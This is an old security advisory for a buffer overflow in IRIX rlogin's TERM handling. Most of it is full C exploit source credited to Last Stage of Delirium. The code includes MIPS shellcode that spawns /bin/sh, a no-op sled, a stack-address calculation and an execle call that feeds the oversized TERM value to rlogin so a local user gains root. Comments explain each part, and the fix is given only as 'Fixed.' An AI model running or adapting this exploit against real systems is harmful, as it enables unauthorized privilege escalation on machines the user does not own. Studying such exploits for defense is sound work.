COMMAND
rlogin
SYSTEMS AFFECTED
IRIX 5.2, 5.3, 6.2, 6.3
PROBLEM
A buffer overflow vulnerability exists in the rlogin program in its
handling of the TERM environment variable. A local user can exploit
this bug to gain root privileges. It was found by LSD.
/*## copyright LAST STAGE OF DELIRIUM oct 1997 poland *://lsd-pl.net/ #*/
/*## /usr/bsd/rlogin #*/
/* Sizes of the fixed-length fields of the TERM payload that main() builds:
 * ADRNUM bytes of the computed address, ALLIGN filler bytes and NOPNUM
 * bytes of the no-op instruction, followed by the shellcode. */
#define NOPNUM 4940
#define ADRNUM 5000
#define ALLIGN 2
/* MIPS machine code, one 4-byte instruction per line (see the per-line
 * comments), followed by the string "/bin/sh" that the preceding
 * instructions address relative to $ra before the syscall. */
char shellcode[]=
"\x04\x10\xff\xff" /* bltzal $zero,<shellcode> */
"\x24\x02\x03\xf3" /* li $v0,1011 */
"\x23\xff\x01\x14" /* addi $ra,$ra,276 */
"\x23\xe4\xff\x08" /* addi $a0,$ra,-248 */
"\x23\xe5\xff\x10" /* addi $a1,$ra,-240 */
"\xaf\xe4\xff\x10" /* sw $a0,-240($ra) */
"\xaf\xe0\xff\x14" /* sw $zero,-236($ra) */
"\xa3\xe0\xff\x0f" /* sb $zero,-241($ra) */
"\x03\xff\xff\xcc" /* syscall */
"/bin/sh"
;
/* Two-instruction stub that main() calls as a function: it copies the
 * current stack pointer into $v0 (the return register) and returns. */
char jump[]=
"\x03\xa0\x10\x25" /* move $v0,$sp */
"\x03\xe0\x00\x08" /* jr $ra */
;
/* Single 4-byte instruction used as the no-op filler; main() repeats its
 * bytes NOPNUM times. */
char nop[]="\x24\x0f\x12\x34";
/* Builds one environment variable, TERM=<payload>, and starts
 * /usr/bsd/rlogin with it as the only environment entry. The payload is
 * ADRNUM bytes of the computed address, ALLIGN bytes of 0xff, NOPNUM bytes
 * of nop[], then shellcode[], NUL-terminated; this is the oversized TERM
 * value described in the advisory above. The fixed-size fields total
 * 9947 bytes, so the payload fits in the 10000-byte buffer. argc/argv are
 * unused. Implicit int return type (pre-C99 style). */
main(int argc,char **argv){
char buffer[10000],adr[4],*b,*envp[2];
int i;
printf("copyright LAST STAGE OF DELIRIUM oct 1997 poland //lsd-pl.net/\n");
printf("/usr/bsd/rlogin for irix 5.2 5.3 6.2 6.3 IP:17,19,20,21,22,32\n\n");
/* Call the bytes of jump[] as a function to read the current stack pointer,
 * add a fixed offset, and store the 4-byte result in adr. The value thus
 * depends on this function's own frame layout, so locals and statement
 * order must not be changed casually. */
*((unsigned long*)adr)=(*(unsigned long(*)())jump)()+10288+7000;
/* The child receives only TERM; the caller's environment is not passed on. */
envp[0]=buffer;
envp[1]=0;
b=buffer;
sprintf(b,"TERM=");
b+=5; /* skip past "TERM=" */
for(i=0;i<ADRNUM;i++) *b++=adr[i%4]; /* adr repeated in a 4-byte cycle */
for(i=0;i<ALLIGN;i++) *b++=0xff;
for(i=0;i<NOPNUM;i++) *b++=nop[i%4]; /* nop repeated in a 4-byte cycle */
for(i=0;i<strlen(shellcode);i++) *b++=shellcode[i];
*b=0;
/* NOTE(review): no #include lines appear on this page, so printf, sprintf,
 * strlen and execle rely on implicit declarations, which only pre-C99
 * compilers accept. The 0 before envp is the argv terminator. */
execle("/usr/bsd/rlogin","rlogin","localhost",0,envp);
}
SOLUTION
Fixed.